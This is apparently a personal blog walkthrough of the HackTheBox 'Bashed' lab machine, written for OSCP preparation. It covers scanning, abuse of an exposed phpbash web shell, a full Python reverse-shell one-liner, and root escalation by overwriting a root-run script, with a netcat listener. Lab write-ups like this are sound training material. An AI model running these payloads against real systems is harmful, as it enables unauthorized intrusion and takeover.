Quick Overview

Bashed Box is one of the Linux Box from TJNull OSCP Practice list. It’s one of those quite easy machine where you get initial foothold in one hop and privilege escalation in second hop.

Bashed VM - HacktheBox Logo



Started with enumerating the target with NMapAutomator script since it helps in automating all possible ports with vulnerability scripts from nmap. Additionally, NmapAutomator can help in recon process using ffuf, nikto, DNSRecon, SMB enumeration.

sudo nmapAutomator.sh -H $IP --type All

NMap Scan Results
Running all scans on
Host is likely running Linux        
---------------------Starting Port Scan-----------------------                                                                
80/tcp open  http
----------------------Starting UDP Scan------------------------                                                                                  
No UDP ports are open

Nikto Scan

Nikto Scan
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2023-02-12 20:19:51 (GMT-5)

+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "".
+ Server may leak inodes via ETags, header found with file /, inode: 1e3f, size: 55f8bbac32f80, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /php/: Directory indexing found.
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2023-02-12 20:23:23 (GMT-5) (212 seconds)
+ 1 host(s) tested

Suspect 1

NMap Scan reports returned very few information, but Nikto scanner has pretty good results with different sub-directories. After going through /dev/ directory, You might come across phpbash php script. Taking a pause, phpbash is one of the open-source software that implements interactive php shell. Now, It’s time to pivot from Enumeration to aquire Local Shell.

HacktheBox - Bashed VM - Enumeration

Hackthebox - Bashed VM - Local Shell

Local Shell

You may use revshell for generating your reverse shell payload. Unlucky me, except python none of the reverse shell language payload was working.

export RHOST="";export RPORT=8085;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Hackthebox - Bashed VM - Local Shell

Privilege Escalation

Now that we’ve landed as local user www-data in the Bashed machine, now let’s try lateral movement via privilege escalation. The first few things I used to execute on shell after landing are whoami and sudo -l verify basic information.

Upon executing sudo -l, looks like user scriptmanager can execute ALL commands without a password. It’s pretty easy to switch user to scriptmanager,

> sudo -u scriptmanager /bin/bash


Now it’s time for running LinEnum.sh script to identify weakness in the system that can be leveraged to escalate privileges. Upon executing, we come to know that /scriptmanager has couple of files named test.py and test.txt. The former is owned by scriptmanager and later by root.

scriptmanager@bashed:/scripts$ ls -l
ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 Feb 20 16:27 test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py

f = open("test.txt", "w")
f.write("testing 123!")

As you can see test.py is writing back to test.txt which is owned by root. Unless test.py is executed by root user, test.txt doesn’t have the similar privilege based on my assumption. Now that test.py is owned by scriptmanager, you can potentially overwrite the content and make root to execute on its own context and try escalating privilege.

Plan for privilege escalation

  1. Overwrite test.py with reverse shell payload.
  2. Allow root to execute test.py - It does automatically, No Actions required.
  3. Listen for reverse shell and capture root shell

Privilege Escalation - Bashed VM - HackTheBox

└─$ nc -lnvp 4242              
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 33960
# dir
test.py  test.txt
# whoami
# cd /root
cd /root
# ls
# cat root.txt
cat root.txt

Capture The Flag

So, there are couple of flags to be submitted as outcome from this HackTheBox VM bashed.

  1. /home/arrexel/user.txt
  2. /root/root.txt

Now, We’ve officially pwned the system and escalated our privileges as root 🎉.

HackTheBox - Shivasurya.me

Closing Note:

I hope this post is helpful for folks preparing for Offensive Security Certified Professional certification exam. For bugs,hugs & discussion, DM in Twitter. Opinions are my own and not the views of my employer.

Author Profile Photo - Shivasurya


Software Engineer, Security @ Dropbox